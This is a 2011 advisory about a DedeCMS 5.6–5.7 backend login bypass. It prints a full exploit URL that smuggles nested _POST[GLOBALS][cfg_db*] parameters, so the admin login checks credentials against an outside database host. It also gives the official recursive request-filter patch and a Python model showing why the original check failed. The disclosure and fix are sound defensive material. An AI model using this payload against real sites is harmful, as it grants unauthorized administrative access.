DedeCMS v5.6-5.7 serious security vulnerability disclosed: no account or password needed, direct entry to the backend - Vulnerability warning - The Black Bar Safety Net

2011-08-12T00:00:00
ID MYHACK58:62201131561
Type myhack58
Reporter Anonymous
Modified 2011-08-12T00:00:00

Description

As is well known, because it is simple to use and has a large user base, DedeCMS (织梦 CMS) has had many vulnerabilities disclosed. Today the editor received a reliable message from a moderator of the official DedeCMS forum: "DEDECMS has a serious security vulnerability; the official patch will be released shortly, so please watch for the patch announcement."

The intrusion steps are as follows:

http://www.xx.com/[DedeCMS backend directory]/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

The letters that were highlighted (black on yellow) in the original are the verification-code value; change them to the current verification code and you enter the site backend directly.

The editor's analysis: the precondition of this vulnerability is that the attacker MUST know the backend path, so when building a site with DedeCMS we must get into the habit of renaming the backend directory. The official solution follows:

Solution:

Find the include/common.inc.php file and locate this block:

// Original check: inspects only the top-level keys of $_REQUEST,
// so a forbidden name nested inside another key is never seen
foreach($_REQUEST as $_k=>$_v)
{
    if( strlen($_k)>0 && preg_match('#^(cfg|GLOBALS)#',$_k) )
    {
        exit('Request var not allow!');
    }
}

Replace it with:

// Check and register externally submitted variables
// Walks every key and every leaf value of the request array recursively,
// so nested keys such as _POST[GLOBALS][cfg_xxx] are also rejected
function CheckRequest(&$val) {
    if (is_array($val)) {
        foreach ($val as $_k=>$_v) {
            CheckRequest($_k);        // check the key itself
            CheckRequest($val[$_k]);  // recurse into the value (array or string)
        }
    } else
    {
        if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
        {
            exit('Request var not allow!');
        }
    }
}

CheckRequest($_REQUEST);
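The following Python model illustrates why the original check is bypassed and why the recursive CheckRequest() fixes it. It is an added example written for this page, not DedeCMS code: php_parse_query() is a simplified, hypothetical imitation of how PHP turns bracketed query keys like _POST[GLOBALS][cfg_dbhost] into a nested array, and the three sample query strings are constructed for the demonstration (the host value is a placeholder). It only models the key/value check, not the later code in DedeCMS that registers request variables.

```python
import re
from urllib.parse import parse_qsl

# Regexes taken from the two versions of the check quoted above.
FLAT_RE = re.compile(r'^(cfg|GLOBALS)')        # original check
RECURSIVE_RE = re.compile(r'^(cfg_|GLOBALS)')  # patched CheckRequest()


def php_parse_query(query):
    """Build a nested dict the way PHP builds $_REQUEST from bracketed keys.

    'a[b][c]=1' becomes {'a': {'b': {'c': '1'}}}. Simplified model written
    for this example (assumption: no '[]' list syntax, last value wins).
    """
    result = {}
    for raw_key, value in parse_qsl(query, keep_blank_values=True):
        m = re.match(r'^([^\[]+)((?:\[[^\]]*\])*)$', raw_key)
        if not m:
            continue
        parts = [m.group(1)] + re.findall(r'\[([^\]]*)\]', m.group(2))
        node = result
        for part in parts[:-1]:
            if not isinstance(node.get(part), dict):
                node[part] = {}
            node = node[part]
        node[parts[-1]] = value
    return result


def flat_check(request):
    """Original check: only the top-level keys of $_REQUEST are inspected."""
    for key in request:
        if len(key) > 0 and FLAT_RE.match(key):
            return False
    return True


def recursive_check(val):
    """Patched CheckRequest(): walk every key and leaf value recursively.

    Mirrors the PHP above, which applies the pattern to values as well as
    keys, so a benign value starting with 'cfg_' is rejected too.
    """
    if isinstance(val, dict):
        for key, sub in val.items():
            if not recursive_check(key) or not recursive_check(sub):
                return False
        return True
    return not (len(val) > 0 and RECURSIVE_RE.match(val))


def evaluate(query):
    """Return (original check passes, patched check passes) for a query."""
    req = php_parse_query(query)
    return flat_check(req), recursive_check(req)


# Constructed sample requests for the demonstration (not real traffic).
NORMAL_LOGIN = 'dopost=login&validate=abcd&userid=admin&pwd=secret'
TOP_LEVEL_OVERRIDE = 'cfg_dbhost=127.0.0.1&userid=admin'
NESTED_OVERRIDE = ('dopost=login&validate=abcd&userid=admin&pwd=secret'
                   '&_POST[GLOBALS][cfg_dbhost]=127.0.0.1'
                   '&_POST[GLOBALS][cfg_dbuser]=root')

if __name__ == '__main__':
    for name, q in [('normal login', NORMAL_LOGIN),
                    ('top-level cfg_ key', TOP_LEVEL_OVERRIDE),
                    ('nested GLOBALS key', NESTED_OVERRIDE)]:
        flat, rec = evaluate(q)
        print(f'{name:20s} original check passes: {flat!s:5}  '
              f'patched check passes: {rec}')
```

The flat check passes the nested request because its top-level keys are dopost, validate, userid, pwd and _POST, none of which match the pattern; the forbidden cfg_ and GLOBALS names sit one level down. The recursive check reaches them and rejects the request, while the plain login passes both checks. Note the side effect visible in the patched code: because values are checked too, a legitimate field whose value begins with "cfg_" or "GLOBALS" is also refused.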